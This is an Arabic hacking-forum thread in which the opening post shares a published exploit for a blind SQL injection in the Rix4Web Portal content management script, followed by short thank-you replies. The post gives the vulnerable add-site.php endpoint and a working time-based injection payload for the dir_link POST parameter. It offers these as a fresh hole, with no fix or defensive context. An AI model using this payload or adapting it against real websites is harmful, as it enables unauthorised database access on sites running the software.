1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Murtadha Albejawe | المشاهدات : 5,356 | الردود : 4
حالة الموضوع:
مغلق
  1. Murtadha Albejawe Developer

    الأنتساب:
    ‏28 يوليو 2012
    المشاركات:
    78
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    30
    الإقامة:
    $$$
    السلام عليكم ورحمة الله وبركاته


    اليوم نزلت ثغره جديده في سكربت آدارة المحتوى الشهير Rix4Web Portal


    معلومات الثغره :


    Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability


    Date: 02/23/2013


    Author: L0n3ly-H34rT


    الثغره


    كود:
    ################################################
    ### Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability
    ### Date: 02/23/2013 
    ### Author: L0n3ly-H34rT 
    ### Contact: l0n3ly_h34rt@hotmail.com 
    ### My Site: http://se3c.blogspot.com/ 
    ### Vendor Link: http://www.rix4web.com/
    ### Software Link: http://www.traidnt.net/vb/traidnt2230161/
    ### Tested on: Linux/Windows 
    ################################################
    
    
    # AND time-based blind In POST:
    
    
    POST http://127.0.0.1/rix/add-site.php?do=addnew&go=add
    
    
    cat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.
    
    
    # Just inject : dir_link
    
    
    ################################################
    
    
    # Greetz To My Friendz
    *=== تحديد كود ===*

     
  2. !»Ś2Ĺ«! Developer

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    68
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    30
    الوظيفة:
    طـالب ثانوي
    الإقامة:
    الــسعوديه
    نظام التشغيل:
    Linux
    رد: عاجل عاجل ثغره في سكربت أدارة محتوى Rix4Web Portal

    مشكور اخي على الثغره


    )5:"​
     
  3. ! ـآوتآر ! DeveloPer Plus

    الأنتساب:
    ‏19 يوليو 2012
    المشاركات:
    192
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    الإقامة:
    السـ جــــده ـعوديـة
    رد: عاجل عاجل ثغره في سكربت أدارة محتوى Rix4Web Portal

    )5:"#:")5:"​
     
  4. Dr.aL-jArH DeveloPer Plus

    الأنتساب:
    ‏24 أغسطس 2012
    المشاركات:
    140
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    رد: عاجل عاجل ثغره في سكربت أدارة محتوى Rix4Web Portal

    ثانكس اخي !!:{
     
  5. D3VIL H4CK3R Developer

    الأنتساب:
    ‏4 مايو 2012
    المشاركات:
    102
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 8
    اللغة البرمجية:
    HTML
    رد: عاجل عاجل ثغره في سكربت أدارة محتوى Rix4Web Portal

    وعليكم السلام ورحمة الله وبركاته

    مشكور عزيزي )5:"​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة